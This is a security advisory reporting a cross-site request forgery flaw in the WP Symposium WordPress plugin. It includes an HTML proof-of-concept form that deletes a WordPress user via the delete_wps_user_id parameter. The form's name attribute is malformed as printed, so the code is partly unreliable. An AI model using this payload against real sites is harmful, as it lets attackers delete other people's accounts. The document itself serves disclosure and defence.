WordPress Symposium 14.05.02 Cross Site Request Forgery

Credit: Madhu Akula
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

Plugin Name : WP Symposium A8-Cross-Site_Request_Forgery_(CSRF) Effected Version : 14.05.02 (and most probably lower version's if any) Vulnerability : A8-Cross-Site Request Forgery (CSRF) Identified by : Madhu Akula Technical Details Minimum Level of Access Required : Unauthenticated PoC - (Proof of Concept) : <html> <body> <form action="http://localhost/wp-admin/admin.php?page=symposiym_manage" method="POST"> <input type="hidden" name="delete&#95;wps&#95";user&#95;id" value="7" /> <input type="submit" value="Submit Request" /> </form> </body> </html> Video Demonstration: https://www.youtube.com/watch?v=prPj0YP1LOw Vulnerable Parameter : delete_wps_user_id Impact : By using this vulnerability attacker can delete any word press user Fixed in : No change Disclosure Timeline Vendor Contacted : 2014-08-01 Plugin Status : No Change on 2014-08-02 Public Disclosure : October 3, 2015 CVE Number : Not assigned yet Plugin Description : WP Symposium turns a WordPress website into a Social Network! It is a WordPress plugin that provides a forum, activity (similar to Facebook wall), member directory, private mail, notification panel, chat windows, profile page, social widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook Connect and Mobile support! You simply choose which you want to activate! Certain features are optional to members to protect their privacy.

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com


Back to Top